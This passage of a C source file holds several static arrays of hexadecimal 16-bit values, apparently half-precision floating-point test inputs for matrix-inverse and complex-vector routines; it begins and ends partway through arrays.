0x3538, 0x3075, 0xaaaf, 0x2895, 0xaeb7, 0xb010, 0xb2a5, 0xb516, 0x2a96, 0x2012, 0xace5, 0xb26a, 0x3066, 0x2db5, 0xb087, 0xb553, 0x28e6, 0xb02e, 0x213e, 0xb937, 0xa735, 0x3514, 0xacce, 0x30f2, 0x32a7, 0x3252, 0x3222, 0x293c, 0xb8ff, 0xae47, 0xac33, 0xad79, 0x2c7b, 0xaf77, 0x30d5, 0xb341, 0x339a, 0x3639, 0xa46a, 0xb84a, 0xb807, 0xb391, 0x264f, 0xb7a2, 0x2c00, 0xb4e0, 0xae7a, 0xb507, 0xacdd, 0x3742, 0x2ba2, 0x374b, 0x33cb, 0x32b8, 0xb5a1, 0x3375, 0x3240, 0x368e, 0xb645, 0xac8d, 0xb0ce, 0x36e6, 0xb0ee, 0xb49a, 0xb66c, 0xb739, 0xaa65, 0x361e, 0xb7b8, 0x2e29, 0xb17f, 0x2b86, 0xb49a, 0xb159, 0xb591, 0x338a, 0x3571, 0x25af, 0xb1ad, 0xb0fd, 0xb439, 0x30eb, 0xb648, 0xb574, 0x346d, 0x35b8, 0xb6ed, 0xaf28, 0xafac, 0xb1a1, 0x3830, 0xae12, 0x332a, 0x2fe6, 0xb919, 0xb1e1, 0xb3ae, 0xb077, 0xb493, 0xb417, 0x33a5, 0xb97d, 0xa410, 0xb7f0, 0x3483, 0x3408, 0xaef7, 0xb09f, 0xb310, 0x3408, 0xadfc, 0x2b39, 0x370c, 0xb7c3, 0x3246, 0x316c, 0x2a67, 0xb017, 0x2c74, 0xb284, 0x3453, 0x300b, 0xb154, 0xb501, 0x3492, 0x321a, 0x2f76, 0x3257, 0xaeff, 0x3495, 0xb6bb, 0xaa02, 0x2ca2, 0xab60, 0x32f0, 0xaec5, 0xb708, 0x3562, 0x271e, 0xb4c6, 0x345a, 0x3884, 0xb47f, 0x2c8f, 0x380b, 0xa682, 0xb6a7, 0xb3e2, 0x3865, 0xabbb, 0xb48b, 0x3032, 0xb1e9, 0x2e09, 0xb613, 0x3251, 0xb019, 0x2e57, 0x2eeb, 0x369c, 0x2f04, 0xb348, 0x2ba3, 0x3124, 0xa5f6, 0xb674, 0xb03f, 0xb6c9, 0xb002, 0xadbf, 0xad88, 0xb862, 0x3105, 0x30e7, 0x2a9c, 0x1c08, 0x36f2, 0x3550, 0xb3b2, 0xb19f, 0xb5d3, 0xb3ee, 0x3544, 0xb1c8, 0x353c, 0xa42c, 0xb137, 0x3445, 0x98aa, 0x3572, 0x362b, 0xb0e1, 0x2c0e, 0x35cd, 0x36c5, 0xb6aa, 0xb0ba, 0x34a4, 0xb441, 0xa837, 0xb539, 0x3368, 0x2eb8, 0x2bcd, 0x2da8, 0x3020, 0x3064, 0xad22, 0x2cc3, 0x34e4, 0x2e8c, 0xb34e, 0x30db, 0x295c, 0xb0b8, 0xb6b1, 0xb02f, 0xb391, 0xb3e3, 0xb162, 0x31e3, 0xa0df, 0xb183, 0xb406, 0x3ad0, 0xb20a, 0x347f, 0xb2a8, 0xb5c4, 0xa828, 0x3061, 0xac79, 0x369a, 0xaed6, 0xb63e, 0xb41c, 0x3625, 0x386b, 0xba8d, 0xac76, 0x3570, 0x2e8d, 0x380e, 0xadfb, 0x3616, 0xb4e1, 0x2b8f, 0xb201, 0xaff7, 0xb643, 0x2ff8, 0x2885, 0xad0c, 0xb235, 0xb319, 0xb0e0, 0xb4f9, 0xb704, 0x2e94, 0x34ff, 0xad6b, 0xb279, 0x36fa, 0xb0fb, 0xb306, 0xb1fa, 0x33b2, 0xb72e, 0xaefa, 0xb3f1, 0xb3f0, 0xacee, 0xb774, 0xb0f4, 0xb3db, 0x2c81, 0x377b, 0x3439, 0xb18b, 0x30cd, 0xbae9, 0x37ee, 0xa96d, 0xb3ad, 0x203a, 0x2d15, 0xb364, 0xb582, 0x34ee, 0x373d, 0x35ad, 0x368b, 0x3542, 0x979e, 0xb823, 0x29c1, 0xb491, 0x2dcb, 0x3801, 0xb04a, 0x31db, 0xb554, 0xad9d, 0xb591, 0xab69, 0xb3cc, 0xb1c8, 0x2e44, 0x2f6a, 0xb896, 0x320e, 0xaff2, 0x34da, 0xb51a, 0xac5a, 0xb6e0, 0xb442, 0x36ef, 0xa75d, 0x28f0, 0xafeb, 0x3252, 0xa580, 0xb00a, 0x34d6, 0xa800, 0xb516, 0xb40b, 0xb2cd, 0xb586, 0xa915, 0x3018, 0x338d, 0xb5d3, 0x3751, 0xa7ec, 0x2d8b, 0xb5a3, 0x37d1, 0xb6fb, 0xaef6, 0x3ad2, 0xb71b, 0x35f0, 0x337a, 0xa622, 0xaf29, 0xb78c, 0x3173, 0xae1b, 0xa181, 0x307f, 0x3350, 0xb0bc, 0x9bb5, 0x2f6f, 0xa290, 0xa457, 0x210c, 0xb194, 0x3503, 0x30be, 0xac61, 0xb84b, 0x310b, 0xb546, 0x33b9, 0x35f7, 0xb511, 0xb026, 0xb617, 0x28dc, 0xb304, 0x3146, 0x2312, 0xb6db, 0x3596, 0xaf2a, 0xb860, 0xb4ca, 0x329c, 0xb5cb, 0x2c1d, 0x3888, 0x3420, 0xb0ce, 0x2c6e, 0x2e22, 0x3635, 0x3418, 0x3375, 0xaa3a, 0xb5cb, 0x31f5, 0x35d7, 0x2b5e, 0x3166, 0xb573, 0xb763, 0x37a3, 0x32e8, 0x2f84, 0x323d, 0x37ba, 0xb581, 0x9484, 0xb707, 0xb515, 0xb391, 0xa92d, 0x343c, 0xb240, 0x300a, 0x310a, 0xb43a, 0xb457, 0x31d6, 0xae72, 0x3288, 0x30a7, 0x1bc7, 0xb01f, 0xb0c3, 0xb477, 0xb62a, 0x319f, 0xb65f, 0x33e3, 0x3920, 0x3255, 0x28ae, 0x32f9, 0x32ae, 0xb6fa, 0x3394, 0x34c2, 0xad4d, 0xa554, 0x2d9f, 0xb8cd, 0x2c59, 0xbbec, 0xb84a, 0xaace, 0xa2e1, 0xb026, 0x2ee4, 0x34ac, 0x30a8, 0x31fd, 0x36ef, 0x3406, 0xad4c, 0xb13b, 0xb678, 0xa986, 0xadcc, 0xace0, 0xa60a, 0x20a8, 0x3637, 0x3660, 0x34dc, 0xb6ae, 0xb48c, 0xb7b5, 0x3733, 0x2fb2, 0x3105, 0x32f1, 0x2d5d, 0x3853, 0x265d, 0xac1f, 0x359d, 0xb01c, 0xacd5, 0xb26a, 0xb49b, 0xb518, 0xb574, 0xb376, 0x92a4, 0xa4fc, 0x365c, 0xaeba, 0x3142, 0xb0bc, 0xb1b5, 0x304e, 0xae90, 0x31d6, 0xb915, 0xb4be, 0x34ca, 0x35a6, 0xab13, 0x35d0, 0x27ef, 0x2dce, 0xb18f, 0x9ce3, 0xb026, 0xb41d, 0xb5bb, 0xb6cf, 0x2dae, 0xb400, 0xb879, 0xae84, 0x31ea, 0xb4da, 0x208a, 0x343c, 0xada6, 0xb21e, 0xac9f, 0x3154, 0x238d, 0x348e, 0x349c, 0x393f, 0x3659, 0xb155, 0x2c0a, 0xab80, 0x36cd, 0x318f, 0xb4c6, 0x309e, 0xb1ce, 0xb88c, 0xb541, 0x2768, 0x3551, 0xa303, 0xb27f, 0xb592, 0xa549, 0x25be, 0xb371, 0x36d6, 0xb609, 0x34e2, 0x3862, 0x3255, 0xb93d, 0xb8c7, 0xb056, 0xb4c1, 0x2a88, 0xa4b4, 0x2ca9, 0xb329, 0xb6fb, 0x38d5, 0xad96, 0x32ee, 0x34ca, 0xb513, 0x19d4, 0x32f2, 0x33c3, 0x37a2, 0x302b, 0x3758, 0xadf6, 0x3241, 0x35cb, 0x29b8, 0x3475, 0x3567, 0x3662, 0x31e1, 0xad79, 0x2815, 0xb559, 0xaa1f, 0x231d, 0xa697, 0x31b8, 0xb362, 0x3237, 0xb188, 0x30ec, 0x2811, 0xa287, 0x3316, 0x3033, 0x2c9a, 0xb107, 0xad5d, 0xb448, 0x27ec, 0x2db8, 0x30be, 0xb60e, 0x3919, 0xb492, 0xac0c, 0xa9e9, 0xb7ec, 0xb251, 0x2e7e, 0xb467, 0x36fa, 0xb8a0, 0x32fe, 0xaf7f, 0x36d7, 0x2cd3, 0xb4a6, 0x3463, 0x1407, 0x37a0, 0xafe3, 0xa092, 0x3489, 0x2874, 0xb4b1, 0x3565, 0xad0e, 0xb614, 0x2ded, 0xacad, 0xac9f, 0x2aad, 0xb1b1, 0xb3a3, 0x346d, 0x348c, 0xa5ee, 0x327d, 0x2c2e, 0xb7f9, 0xb098, 0x3909, 0x3197, 0x3945, 0xb6dd, 0xb4c3, 0x36cf, 0x36d7, 0x3345, 0xb285, 0xae9e, 0x36d8, 0x3144, 0xb1f2, 0x304a, 0xb598, 0x3444, 0xb564, 0xb2cd, 0xb1cf, 0xb427, 0x2f53, 0xb90d, 0xa843, 0x3458, 0x304c, 0x339c, 0xb890, 0xb3c5, 0xb521, 0x344f, 0xada2, 0xb7af, 0x34dd, 0xa968, 0x3820, 0xb050, 0xb155, 0x34b8, 0xb4d1, 0x2cd5, 0xaab6, 0xaed8, 0xb1b2, 0x34f0, 0x347d, 0xb56e, 0xb4a7, 0xb512, 0xb135, 0x3020, 0xb697, 0x36e5, 0xb177, 0xb58c, 0xb333, 0xb1b6, 0xb8a7, 0xb01e, 0xb25e, 0xb586, 0x38ae, 0x1312, 0x34f9, 0xb4fc, 0xb0d7, 0xb2b8, 0xb433, 0x17ac, 0x30fb, 0x2a87, 0x39b4, 0x8455, 0x20ca, 0x2f8c, 0xaab2, 0x3892, 0xa502, 0xb1c0, 0xb61d, 0xae32, 0xb234, 0x35aa, 0x3634, 0x2581, 0xb1aa, 0xb649, 0xaff5, 0x36dd, 0xb163, 0xa887, 0x2c61, 0x3190, 0xb213, 0x2e52, 0xac1e, 0xa933, 0xae3a, 0xb656, 0xb1b0, 0x3890, 0x283c, 0x3518, 0x3640, 0x3415, 0x3189, 0xb0a5, 0xa85b, 0xb91b, 0x3883, 0x3833, 0xb5f6, 0xb417, 0xb6ea, 0x31dd, 0x2913, 0x308e, 0xad6e, 0xad35, 0x307b, 0x33a7, 0x330d, 0xb18b, 0x3737, 0xb598, 0x2cfc, 0xb768, 0x269a, 0x3351, 0xb7c9, 0x262e, 0xb4de, 0x2fa0, 0x31ab, 0xb204, 0x3040, 0x30f8, 0xb890, 0x2a8e, 0x3459, 0xb11a, 0x3574, 0x35c9, 0xb3c5, 0xb06c, 0x2eb7, 0x1261, 0x352c, 0x3507, 0xa4a4, 0x33bf, 0xb372, 0x3111, 0xb0f2, 0xb4ae, 0x319d, 0x2e3b, 0xb17b, 0x32af, 0x374b, 0x2620, 0xa599, 0xadb8, 0x2f39, 0x35d2, 0xb626, 0x2e14, 0xa925, 0x387f, 0xb0e4, 0x37d7, 0x3773, 0x2e8d, 0x349b, 0x35c3, 0xac57, 0xb0f5, 0x2f9f, 0xb92a, 0xb1c7, 0xa5c9, 0xafa0, 0x2f13, 0xb6ba, 0xb4fc, 0x339d, 0xad02, 0xadf1, 0x1ed2, 0x3390, 0x2a07, 0xb45f, 0x2f45, 0x35ab, 0xb591, 0xb55e, 0xa83e, 0x3929, 0xadc6, 0x2bfa, 0x35b8, 0xbc00, 0xae30, 0x3642, 0x3273, 0x342e, 0x3628, 0x1faa, 0xaa29, 0x3870, 0x35f6, 0x3238, 0xa623, 0x34c6, 0xb515, 0xb7e4, 0xb3c9, 0x3217, 0x392a, 0x301b, 0x2df7, 0x32d2, 0x33f6, 0xb87a, 0x352b, 0x3350, 0x2871, 0x350b, 0x32bb, 0x38d4, 0x380a, 0x3480, 0xb3c5, 0xb440, 0x33a3, 0xb503, 0xb93a, 0x2f03, 0xb2f7, 0xb487, 0xb482, 0x3164, 0xb816, 0x3554, 0xa4bb, 0x36b5, 0xa946, 0xa499, 0xb4b7, 0x3654, 0xacf9, 0x3733, 0xb371, 0xb27e, 0xb293, 0xb0d7, 0xb038, 0xb751, 0xa350, 0xb71c, 0xb409, 0xae90, 0xa358, 0xb81c, 0xb0f9, 0x2f48, 0x2ab8, 0x3915, 0xb43b, 0x28bd, 0x34b1, 0xb585, 0x1464, 0xaa81, 0xb395, 0x3118, 0xb54f, 0x307f, 0x34b2, 0xac62, 0x2f0b, 0x37ca, 0x30a2, 0x2c63, 0xab8a, 0x3065, 0x356d, 0xaa4e, 0xadfb, 0x2c04, 0x3132, 0xb65c, 0xb267, 0x3170, 0x2b59, 0xb1d1, 0x347e, 0xb659, 0xa738, 0xb06b, 0x317c, 0xb640, 0x350d, 0xafd9, 0xb8ae, 0x38e3, 0xb415, 0x2f11, 0x33da, 0xb59c, 0xb5c5, 0xb82e, 0x34a9, 0xafd6, 0xaf31, 0x32a4, 0xb41e, 0x3654, 0x30f5, 0xb73b, 0x3418, 0x29cd, 0xb071, 0xb123, 0xb079, 0xb54a, 0xabc2, 0xab79, 0xb37b, 0xac7f, 0x2a47, 0x3512, 0x3103, 0xaeb2, 0x3000, 0xaffd, 0xb203, 0x31ac, 0x314c, 0xb0b8, 0x2cbf, 0x3614, 0xb38e, 0xaf16, 0xb194, 0x316d, 0xb642, 0x3425, 0x3176, 0x2e28, 0x3ac7, 0xb23e, 0xb6c3, 0xab75, 0x3409, 0xb31b, 0x2c3c, 0xae47, 0xb0ac, 0xb081, 0xb6fe, 0xa988, 0x2c6a, 0xba82, 0xa77d, 0x291e, 0xaf08, 0x2f1c, 0xb45c, 0x2422, 0xb709, 0x2f78, 0x2f64, 0x2f25, 0xaa7c, 0xab15, 0x2c8d, 0xb06f, 0x38c4, 0x3442, 0xb527, 0x2ffe, 0x3339, 0xb594, 0x38e7, 0x31d0, 0xb4ec, 0x30da, 0xb64c, 0x209f, 0xacb3, 0x2067, 0xb27c, 0x38b8, 0x3506, 0x2f44, 0x3104, 0x3443, 0x343f, 0xa08e, 0x34d2, 0xa961, 0x2f1c, 0x2f19, 0x32f5, 0xb4a4, 0xaaa0, 0x2e0e, 0x282c, 0x3811, 0xa390, 0x2fed, 0xb1c9, 0x33bb, 0xacaf, 0x2caf, 0x3734, 0x38b9, 0x3843, 0xb2ca, 0x37c5, 0xb9b3, 0x3170, 0x37f4, 0xb2a1, 0xb167, 0xa332, 0x1381, 0xb59c, 0xb8b0, 0xb0ba, 0xb04c, 0xb9f1, 0x26ef, 0xb439, 0xb50b, 0x30b1, 0xb295, 0x33ab, 0x3146, 0x2730, 0xab27, 0x3521, 0xabf5, 0x9c16, 0x24f7, 0x34a0, 0xa795, 0xb65a, 0xb010, 0x301d, 0x3126, 0xb173, 0x2478, 0x90ed, 0x2a37, 0x3566, 0x29d2, 0xae61, 0x3453, 0x25d5, 0x3054, 0x3012, 0xb905, 0xb45f, 0x2f32, 0xb430, 0xaa17, 0xacfc, 0x3196, 0xa47c, 0xab76, 0x2561, 0x2289, 0xb453, 0xb059, 0xb826, 0x3776, 0xa41a, 0x3562, 0x3119, 0xb674, 0x35b8, 0x35ab, 0xb1a3, 0xb904, 0xb01c, 0x2efa, 0xafb0, 0xb1c6, 0x348b, 0x31ef, 0xb2bb, 0xb4ae, 0xae00, 0x31aa, 0x3165, 0xb461, 0xb5e5, 0x2f0e, 0xb168, 0x9224, 0xb393, 0xb13d, 0x9ada, 0x313d, 0xaf52, 0x30dd, 0x325d, 0x2db8, 0xb2b0, 0x2010, 0x33dd, 0xb152, 0xb494, 0xb42a, 0x29a5, 0x1ee2, 0xb6d7, 0x2b41, 0x3422, 0xb9c9, 0xb67a, 0xb6d1, 0x2e0a, 0x9cf4, 0x38b8, 0x16d6, 0x3431, 0xab72, 0xb489, 0x204c, 0x2edc, 0x2c55, 0x32cd, 0xb57c, 0x9599, 0x3273, 0xa31a, 0xb0ec, 0xb58f, 0xb1dd, 0x249f, 0x3372, 0x38d7, 0xb647, 0x372d, 0x3066, 0x9b65, 0x2bba, 0x36d0, 0x3208, 0xa86f, 0xb1ab, 0x3290, 0x2a59, 0xb490, 0x34fa, 0x35fc, 0xa0c5, 0xb258, 0xb52d, 0xb146, 0x2fb7, 0xabd8, 0xaae6, 0xb8db, 0xa804, 0xa818, 0x2c05, 0x2fa1, 0x389c, 0x36a4, 0xac3a, 0x3325, 0xb5a5, 0xb7b0, 0xb843, 0x34e7, 0xb1a3, 0x385f, 0xb335, 0x2614, 0x331f, 0xa5ab, 0xb317, 0xb101, 0x345e, 0xb5e2, 0x38d6, 0x3505, 0x2ed1, 0x313c, 0x30a3, 0x3809, 0x360d, 0x36ff, 0x3083, 0xb3fa, 0xb79c, 0xb250, 0x21b8, 0xab67, 0x2e70, 0xb110, 0xb4ae, 0x3304, 0x3569, 0x28cc, 0x34ef, 0xaff9, 0x3343, 0x3509, 0xb78d, 0xb8ce, 0x9e20, 0xb7fe, 0xb39a, 0xb849, 0xad5e, 0xb088, 0x2f43, 0x3401, 0xaf44, 0x38ac, 0x979c, 0x2f8c, 0x380a, 0x22d8, 0xa92e, 0x28f9, 0xb58d, 0xb2d7, 0xa9eb, 0xa8f3, 0x34dd, 0xb7c3, 0xaf95, 0x362d, 0xb808, 0x2e4c, 0x310e, 0xb66a, 0xab52, 0x381b, 0x34e7, 0x2628, 0xb683, 0x38a7, 0xb675, 0xb0e5, 0x348d, 0xaeb9, 0x2c0a, 0x2ad5, 0xae1a, 0xb3ad, 0xb535, 0x3228, 0x2c27, 0x30c8, 0x2e0c, 0xaff8, 0xb468, 0xa579, 0xabcf, 0x3467, 0xaa3e, 0xb707, 0x3285, 0x3663, 0x31f5, 0x2c78, 0x2de7, 0xbaae, 0x957a, 0x3392, 0x1c1f, 0xb48e, 0xac2e, 0x33ca, 0xb1ae, 0x302f, 0xa903, 0x33ff, 0x3690, 0xad6c, 0x2dbe, 0xb7d4, 0xb20b, 0xb144, 0xb58d, 0xb899, 0xa8bd, 0x307f, 0xb605, 0x340a, 0x36c6, 0xb5ed, 0x35b6, 0x2de5, 0x3435, 0xb76f, 0xb5f2, 0xa7ab, 0xadac, 0xb2a5, 0x3592, 0xb4d4, 0x380e, 0xada5, 0xb2fa, 0xa617, 0x2e98, 0x3092, 0xb560, 0xada0, 0xb6f7, 0xb216, 0xb576, 0x311a, 0xb2fa, 0xb606, 0xb11f, 0xb46d, 0x3178, 0x38df, 0xaac4, 0x3703, 0x348a }; static const uint16_t in_inv[709] = { 0x3800, 0x39a8, 0x39a8, 0xb9a8, 0x39a8, 0x3a70, 0xb4f8, 0x380c, 0x380c, 0x3a70, 0xb4f8, 0xb4f8, 0x380c, 0x3a70, 0x3c00, 0x4000, 0x4200, 0x4400, 0x4000, 0x4400, 0x4500, 0x4600, 0x4200, 0x4500, 0x4880, 0x4900, 0x4400, 0x4600, 0x4900, 0x4c00, 0x3bd4, 0x3548, 0x3b9d, 0x34e1, 0x3b66, 0x3804, 0x3387, 0x31ee, 0x377f, 0x3ba5, 0x3bc5, 0x3919, 0x38f5, 0x3af2, 0x3618, 0x3a45, 0x3aed, 0x3b2a, 0x3aaf, 0x3ad8, 0x3675, 0x3922, 0x2baa, 0x3902, 0x285e, 0x2d89, 0x37bb, 0x3917, 0x31ba, 0x3348, 0x2ccc, 0x3613, 0x3b80, 0x3aad, 0x303b, 0x3508, 0x374f, 0x3bff, 0x3b3c, 0x2f0f, 0x3616, 0x383d, 0x3274, 0x377e, 0x3745, 0x35de, 0x2a88, 0x321b, 0x3911, 0x3655, 0x38fe, 0x3b15, 0x3ba2, 0x34f7, 0x341f, 0x390d, 0x36cb, 0x3031, 0x3a66, 0x3047, 0x37ac, 0x3827, 0x3619, 0x38f1, 0x39fc, 0x30b4, 0x3b6e, 0x36e5, 0x3811, 0x3aa2, 0x35ba, 0x3bff, 0x3ad1, 0x3462, 0x397d, 0x2997, 0x34b9, 0x377b, 0x2a99, 0x32bb, 0x38dc, 0x3890, 0x347f, 0x3bd5, 0x2e11, 0x351b, 0x3660, 0x3599, 0x39ae, 0x36e8, 0x372a, 0x2cc9, 0x2b4e, 0x314d, 0x3a2f, 0x3058, 0x39ad, 0x3afe, 0x34ae, 0x1826, 0x3649, 0x3829, 0x2ac2, 0x3a62, 0x38e8, 0x3814, 0x2994, 0x3a3f, 0x3baf, 0x384a, 0x32ea, 0x304b, 0x333a, 0x3a0c, 0x3573, 0x38d8, 0x384c, 0x309b, 0x3981, 0x344b, 0x362e, 0x35a7, 0x38df, 0x3b7f, 0x31cc, 0x392a, 0x3074, 0x3939, 0x3928, 0x394c, 0x3bb9, 0x3814, 0x3b5e, 0x37fb, 0x3868, 0x8be, 0x366d, 0x3275, 0x318d, 0x3a8e, 0x38c4, 0x2e17, 0x3a77, 0x3b65, 0x3582, 0x3686, 0x3aea, 0x3580, 0x3bc8, 0x3a77, 0x39bb, 0x36a6, 0x3a35, 0x2d0a, 0x38b7, 0x3983, 0x32f7, 0x36a9, 0x3322, 0x2b1a, 0x33c9, 0x39be, 0x2d9c, 0x3967, 0x3094, 0x39b8, 0x3b1d, 0x3876, 0x37a6, 0x3259, 0x28cd, 0x3bd5, 0x38bc, 0x3501, 0x3860, 0x3939, 0x3038, 0x3aa1, 0x2de2, 0x3827, 0x3395, 0x3b0d, 0x373e, 0x3b93, 0x38bb, 0x33ee, 0x3bd1, 0x3b30, 0x38d3, 0x3492, 0x3466, 0x3966, 0x3a95, 0x3996, 0x39a2, 0x39e3, 0x39c0, 0x3587, 0x35f8, 0x3c00, 0x32d9, 0x3492, 0x2eaa, 0x3bde, 0x3af3, 0x2dd3, 0x38dd, 0x39aa, 0x37cb, 0x3b94, 0x3963, 0x339b, 0x3ab1, 0x3369, 0x356a, 0x3ba1, 0x37c8, 0x3884, 0x3877, 0x1c63, 0x308a, 0x30f1, 0x351e, 0x3963, 0x3a7a, 0x3904, 0x39b0, 0x3858, 0x2477, 0x38c4, 0x325c, 0x3bb0, 0x3a3b, 0x391c, 0x3b91, 0x340a, 0x39da, 0x2ede, 0x340d, 0x399e, 0x383f, 0x2c6f, 0x310d, 0x218c, 0x1c83, 0x348b, 0x3941, 0x34a0, 0x32b5, 0x3840, 0x3887, 0x3bca, 0x3478, 0x301a, 0x3911, 0x301f, 0x3a62, 0x33f0, 0x303d, 0x3b98, 0x316f, 0x3af9, 0x3704, 0x3a05, 0x32d2, 0x3966, 0x31bb, 0x3ae7, 0x3695, 0x375b, 0x3404, 0x3046, 0x3439, 0x35d3, 0x2fc8, 0x3b88, 0x372a, 0x3a17, 0x3a79, 0x38c3, 0x2412, 0x2f54, 0x3044, 0x2a2a, 0x3b8d, 0x31df, 0x3568, 0x3914, 0x3a0b, 0x39f4, 0x32cf, 0x3709, 0x34db, 0x39d5, 0x37d2, 0x3480, 0x3822, 0x2f2a, 0x3be8, 0x34a9, 0x384a, 0x35c1, 0x3b5d, 0x3ad7, 0x3af8, 0x3afc, 0x3a8c, 0x3b44, 0x39ea, 0x34cd, 0x3a1d, 0x366f, 0x3889, 0x357b, 0x3a0e, 0x3b35, 0x34af, 0x3bd8, 0x39c7, 0x3848, 0x3bb4, 0x3aac, 0x32cb, 0x3b5b, 0x3948, 0x2d69, 0x373b, 0x3bbe, 0x3b68, 0x3b56, 0x2e39, 0x3baa, 0x37a5, 0x3566, 0x3a9a, 0x3a4e, 0x3717, 0x3656, 0x26e0, 0x38e0, 0x350f, 0x390e, 0x2f8a, 0x34dc, 0x31b3, 0x335f, 0x3680, 0x30ac, 0x3b35, 0x38e0, 0x3910, 0x3208, 0x30e5, 0x26b1, 0x3314, 0x36b5, 0x374f, 0x3440, 0x37b6, 0x3328, 0x38a7, 0x36cd, 0x354f, 0x381b, 0x39ab, 0x2e5e, 0x3aaf, 0x2d2c, 0x37ac, 0x3a5a, 0x3b21, 0x362d, 0x3127, 0x3129, 0x362c, 0x315d, 0x39e1, 0x3509, 0x35ab, 0x3533, 0x3bf8, 0x342c, 0x31e9, 0x3a61, 0x36e5, 0x3658, 0x3b05, 0x351f, 0x399d, 0x2c12, 0x30fa, 0x3ab0, 0x3414, 0x39d5, 0x3b6a, 0x395a, 0x327f, 0x31e9, 0x395c, 0x3b63, 0x2f28, 0x293b, 0x3bd2, 0x3451, 0x327e, 0x3855, 0x32f2, 0x30cd, 0x36f8, 0x2888, 0x3138, 0x39a9, 0x2838, 0x2e2b, 0x3a41, 0x2d35, 0x3ad4, 0x3510, 0x337a, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x0, 0x4200, 0x4400, 0x4500 }; static const uint16_t in_vec1[47] = { 0xb15e, 0xb258, 0x2d6e, 0xb63f, 0x9283, 0xbc00, 0x2134, 0x306b, 0xb175, 0xb278, 0xad5d, 0x35b7, 0x3242, 0x2b02, 0xaa5c, 0xae69, 0x38f9, 0x3990, 0x31ec, 0xb0f4, 0x33a1, 0xb46d, 0x3454, 0x339f, 0x342a, 0x3243, 0x2d1e, 0x3312, 0xba00, 0xb059, 0x311d, 0xb83b, 0xab8c, 0xaa65, 0x38ea, 0x34dc, 0xa52e, 0xb604, 0xb827, 0xb620, 0xa57, 0xb339, 0xb666, 0xb53f, 0x3142, 0x2d76, 0x30a5 }; static const uint16_t in_cmplx1[4418] = { 0x2ed0, 0x34a0, 0x3420, 0x36b3, 0xb2c4, 0xad9e, 0xb54a, 0x301f, 0xb19b, 0xb30f, 0x3326, 0xb2e1, 0x34db, 0x36c6, 0x3274, 0x2099, 0x135c, 0xb8af, 0xb7fd, 0x30e9, 0xa11f, 0xaeec, 0x3594, 0x3342, 0x3343, 0x2c4a, 0x31ff, 0x3751, 0xb4ff, 0x34eb, 0x3612, 0x27a6, 0x2e86, 0xb400, 0xa474, 0x2fe4, 0x302d, 0x3508, 0x3939, 0x1db0, 0xb66f, 0x184a, 0x3463, 0xa761, 0xadff, 0xa93a, 0x33fc, 0xb288, 0x302e, 0x3013, 0xb2ca, 0x3157, 0x34bf, 0xb02d, 0xb1f3, 0x3554, 0x3418, 0xb096, 0x3495, 0xb583, 0x2d40, 0x3020, 0x3140, 0xae42, 0xb902, 0xac20, 0x283a, 0xad51, 0x3178, 0x322c, 0xb4d9, 0xb4ec, 0x3435, 0xb5c7, 0xb4bf, 0xb12b, 0x2711, 0xb1af, 0xac6a, 0x2b50, 0xb049, 0xa846, 0x2ecc, 0xaeb8, 0xa639, 0xb24a, 0xb0d7, 0x2a40, 0x20f7, 0xa2c2, 0x2c6e, 0x38bc, 0x3469, 0xb18c, 0x3199, 0x3538, 0xb0c6, 0x2ced, 0x2e59, 0xaf8f, 0xaf15, 0xa347, 0xb0ef, 0xb505, 0xb63f, 0xb0b6, 0x35f8, 0xaea7, 0x3765, 0x314f, 0x3457, 0x3419, 0xb560, 0x32fe, 0xb461, 0xb2e7, 0xb1c8, 0x38ba, 0x30c7, 0x2bfc, 0xa2ff, 0x3708, 0x3677, 0xaa64, 0x34af, 0xb76c, 0xb2f1, 0xb1bd, 0x2d9f, 0xb64c, 0x31ce, 0x2b87, 0xb848, 0xb062, 0xaf0b, 0x32a3, 0xb4ca, 0x36aa, 0x3549, 0xb45f, 0x2f96, 0xb104, 0xac74, 0xa4b4, 0xa453, 0x3279, 0xac7b, 0x31de, 0x3515, 0xb3b7, 0xb825, 0xb3d7, 0x3419, 0x33a9, 0x33ae, 0x377a, 0x28da, 0x303d, 0x1067, 0x3537, 0xb6d9, 0xb7d4, 0x2ce3, 